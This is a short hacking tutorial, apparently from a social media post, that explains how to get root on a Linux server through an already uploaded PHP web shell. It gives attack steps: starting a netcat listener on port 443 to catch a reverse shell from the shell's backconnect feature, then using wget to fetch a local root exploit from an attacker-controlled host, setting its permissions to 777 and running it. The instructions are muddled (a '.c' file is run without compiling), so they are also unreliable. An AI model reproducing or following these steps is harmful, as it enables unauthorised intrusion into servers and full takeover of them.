
‪#‎Server_Rooting‬ How To Gain RoOt Privilages In ‪#‎Linux_Server‬. But, let me tell you what is Server Rooting? Ans-)Server rooting is a process where an attacker intrudes to the system or you can say server and escalates the ROOT privileges. Now we are going to learn how it works.WHAT WE NEED ..??? 1. PHP Shell Uploaded On A Server .. 2. Netcat .. STEPS:- * First Of All , Download Netcat Download Link - http://www.downloadnetcat.com/ nc11nt.zip * Open Netcat * Type -lnvp 443 And Press Enter..! You will get something like this :- * Now Go To Backconnect Option , Give The Port As 443 , And Click On Connect...!! * Now Your Shell Is On Netcat . Now , You will get the following commands. oK , Now The Most Tricky part Executing Shell To T4he Server ... *Find A Local roOT Exploit For The Same Kernal Here is the list of exploit:- http://pastebin.com/ A0sUhhrz * Now Upload It At Any Web Hosting Site Or At Any Server.. * And Give The Command "wget abc.com/ exploitname " abc.com is the site where u have uploaded. Your Exploit .... And "exploit.c" Is The Name of Local root exploit . now exploit has been saved at server side using shell J ok , now we have to set the permission of the exploit to 777. go to cmd prompt and type chmod 777 exploitname.c run the exploit with the command ./exploitname You Will Get The RoOt Privilages .


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